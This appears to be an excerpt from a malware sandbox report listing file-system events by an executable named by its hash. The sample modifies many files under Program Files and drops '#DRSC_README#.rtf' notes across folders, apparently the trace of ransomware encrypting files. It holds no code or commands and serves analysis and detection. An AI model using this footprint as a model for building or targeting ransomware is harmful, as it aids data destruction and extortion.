C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\example_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.docs.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-up.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\management\jmxremote.password.template 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\faf-main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\chrome-ext.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_nl_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\te.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP.bat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\check-mark-1x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\index_poster.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\about.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\Close.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-down_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_selected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker_1.1.200.v20131119-0908.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\editpdf-tool-view.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.alert.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.event_1.3.100.v20140115-1647.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\resources.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\StorageConnectors.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\indxicon.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\rockbox_fm_presets.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jstack.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\ICU\icudt26l.dat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\idlj.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\exportpdfupsell-app-selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\include\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\upsell-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\es-es\PlayStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\home-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\dd_arrow_small2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Javascripts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\PlayStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\VERSION.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_backarrow_default.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\file_info2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOffNotificationInAcrobat.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\README.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-masterfs.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\Xusage.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_duplicate_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-hover_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-up-pressed.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\s_checkbox_unselected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_basestyle.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_fr_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\createpdf.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-cn\AppStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\javacpl.cpl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugins\rhp\pages-app-tool-view.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sk_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-explorer_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\management\snmp.acl.template 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_hover.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\CIEXYZ.pf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluNoInternetConnection_120x80.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_hover_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\derby_common.bat 